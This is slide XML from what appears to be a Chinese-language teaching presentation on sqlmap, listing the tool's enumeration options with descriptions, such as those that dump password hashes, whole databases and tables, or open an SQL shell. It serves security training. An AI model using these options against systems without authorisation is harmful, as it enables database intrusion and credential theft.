                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外还可以运行自己 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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b, --banner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检索数据库管理系统的标识</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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current-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检索数据库管理系统当前用户</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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current-db </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检索数据库管理系统当前数据库</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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is-dba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当前用户是否 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111338019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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4740721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举数据库管理系统用户</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举数据库管理系统用户密码哈希 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举数据库管理系统用户的权限 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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roles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举数据库管理系统用户的角色</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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dbs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举数据库管理系统数据库</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库中的表</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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columns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库表列</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>转储数据库管理系统的数据库中的表项 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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dump-all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>转储所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库表中的条目 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42356572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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4740721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>搜索列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或数据库名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S) -D DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>要进行枚举的数据库名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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T TBL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>要进行枚举的数据库表</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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C COL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>要进行枚举的数据库列 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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U USER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用来进行枚举的数据库用户 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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exclude-sysdbs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举表时排除系统数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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start=LIMITSTART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第一个查询输出进入检索 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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stop=LIMITSTOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最后查询的输出进入检索 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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first=FIRSTCHAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第一个查询输出字的字符检索 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302441383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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="3700437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--last=LASTCHAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最后查询的输出字符检索 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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sql-query=QUERY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>要执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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sql-shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提示交互式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
